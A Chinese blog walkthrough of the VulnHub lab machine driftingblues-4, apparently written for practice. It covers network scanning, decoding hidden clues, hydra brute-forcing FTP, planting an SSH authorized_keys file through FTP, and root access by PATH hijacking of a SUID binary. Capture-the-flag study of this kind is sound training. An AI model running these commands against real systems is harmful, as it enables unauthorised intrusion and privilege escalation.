首页 > 其他分享 >vulnhub靶机:driftingblues-4

vulnhub靶机:driftingblues-4

时间:2024-02-27 20:23:07浏览次数:26  
标签:ftp 10.9 driftingblues keys authorized vulnhub hubert 靶机 ssh

一:主机发现

arp-scan -I eth0 10.9.23.0/24

二:端口扫描

nmap -T4 -sV -p- -A 10.9.23.195

三:端口探测

80端口

产看源码,发现一串base64

Z28gYmFjayBpbnRydWRlciEhISBkR2xuYUhRZ2MyVmpkWEpwZEhrZ1pISnBjSEJwYmlCaFUwSnZZak5DYkVsSWJIWmtVMlI1V2xOQ2FHSnBRbXhpV0VKellqTnNiRnBUUWsxTmJYZ3dWMjAxVjJGdFJYbGlTRlpoVFdwR2IxZHJUVEZOUjFaSlZWUXdQUT09

解码得到

go back intruder!!! dGlnaHQgc2VjdXJpdHkgZHJpcHBpbiBhU0JvYjNCbElIbHZkU2R5WlNCaGJpQmxiWEJzYjNsbFpTQk1NbXgwV201V2FtRXliSFZhTWpGb1drTTFNR1ZJVVQwPQ==

继续解码

tight security drippin aSBob3BlIHlvdSdyZSBhbiBlbXBsb3llZSBMMmx0Wm5WamEybHVaMjFoWkM1MGVIUT0=

继续

i hope you're an employee L2ltZnVja2luZ21hZC50eHQ=

最后得到一个目录

/imfuckingmad.txt

访问后又得到一串 Brainfuck 编码

解码得到

一个图片路径

/iTiS3Cr3TbiTCh.png

解码得到一个地址

https://i.imgur.com/a4JjS76.png

加载不出来需要魔法

四:渗透测试

得到四个用户luther、gary、hubert、clark。尝试暴破一下 ftp:

hydra -L user.txt -P /usr/share/wordlists/rockyou.txt ftp://10.9.23.195

得到用户名和密码

luther/mypics

登录ftp

ftp 10.9.23.195

进入发现只有sync_log有东西,下载到本地进行查看

是 sync(linux同步命令,含义为迫使缓冲块数据立即写盘并更新超级块),那我尝试往 ftp 中的 hubert 文件中写入 ssh 密钥,猜测应该就会同步到 hubert 用户的家目录中,现在 ftp 中的 hubert 目录下创建 .ssh 目录:

首先先在kaii本地生成秘钥ssh-keygenid_rsa.pub SSH 公钥文件另存为 authorized_keys

ssh-keygen -t rsa

文件保存至/root/.ssh

mv id_rsa.pub authorized_keys

使用 ftp 上传 authorized_keys 到靶机里 ftp 10.9.23.195 进入hubert目录创建.ssh目录

mkdir .ssh

找不到放在root目录下试试

cp authorized_keys /root/authorized_keys

put authorized_keys

上传成功

chmod 400 id_rsa #给权限
ssh [email protected] -i id_rsa #登入

得到第一个flag

五:提权

寻找 suid 程序与命令劫持提权

在 shell 中寻找 suid 程序:

find / -perm -u=s -type f 2>/dev/null

和3一样,发现一个getinfo

/usr/bin/getinfo

根据上面输出的结果,可以推测这个程序中执行了

ip addr, cat /etc/hosts, uname -a
因此,在这种情况下,我们可以在环境变量 PATH 中提供一个目录 (/tmp),并创建一个 ip
或者 cat 文件,用于劫持命令,执行我们自定义的二进制文件就可以提权

export PATH=/tmp/:$PATH
cd /tmp
echo '/bin/bash' > ip
chmod +x ip
/usr/bin/getinfo

得到第二个flag,靶机结束

标签:ftp,10.9,driftingblues,keys,authorized,vulnhub,hubert,靶机,ssh
From: https://www.cnblogs.com/woaishuaidan/p/18037871

相关文章

  • vulnhub靶机:driftingblues-2
    一:主机发现arp-scan-Ieth010.9.23.0/24二:端口扫描nmap-T4-sV-p--A10.9.23.50三:端口探测1:ftpftp可以实现匿名登录anonymousgetsecret.jpg得到一张图片先用steghide查看隐藏信息steghideextract-sfsecret.jpg需要密码所以尝试利用stegseek爆破stegs......
  • driftingblues-1
    一:主机发现arp-scan-Ieth010.9.23.0/24二:端口扫描nmap-T4-sV-p--A10.9.23.102三:目录探测dirbhttp://10.9.23.102-X.txt,.php,.html,.bak,.md四:渗透测试[email protected]@driftingblues.boxL25vdGVmb3JraW5nZmlzaC50eHQ=bas......
  • Raven2靶机
    首先nmap扫描nmap-p--sV192.168.234.0/24有80端口访问一下注:http非加密协议是80端口,https加密协议是443端口发现有网页我先枚举一下子目录这里用dirbdirbhttp://192.168.234.29/去这些目录看一下这里获得第一个flag这里我说明一下,我没有任何技巧都是一个一个打开......
  • NYX(VulnHub)
    NYX(VulnHub)1、nmap2、web浏览3、目录爆破4、发现敏感文件5、ssh连接6、user.txt7、sudo-l8、查找提权方式9、gcc提权10、root.txt......
  • vulnhub-wp DerpNStink:1
    ......
  • vulnhub-wp DC:9
    ......
  • vulhub-driftingblues
    driftingblues1nmap-sn192.168.56.1/24#主机ip发现#端口扫描nmap-A-v192.168.56.108Discoveredopenport80/tcpon192.168.56.108Discoveredopenport22/tcpon192.168.56.108PORTSTATESERVICEVERSION22/tcpopensshOpenSSH7.2p2Ubuntu4ubu......
  • Dr4g0nB4ll - Vulnhub靶机
    Dr4g0nB4ll-Vulnhub靶机主机发现192.168.30.133信息收集└─$nmap-sV-A192.168.30.133StartingNmap7.94(https://nmap.org)at2024-02-2203:26ESTNmapscanreportfor192.168.30.133Hostisup(0.0013slatency).Notshown:998closedtcpports(conn......
  • 靶机Matrix-Breakout 2 Morpheus
    Matrix-Breakout2Morpheus笔记拿到靶机先扔VMware信息收集没其他东西了,于是先在nmap收集信息nmap-sn192.168.0.0/24-snPing扫描-禁用端口扫描发现靶机地址为192.168.0.104,继续收集信息,先给一套组合拳nmap-T4-sV-p--A192.168.0.104-sV:此选项启用版本检测。......
  • vulnhub-DC-6
    ......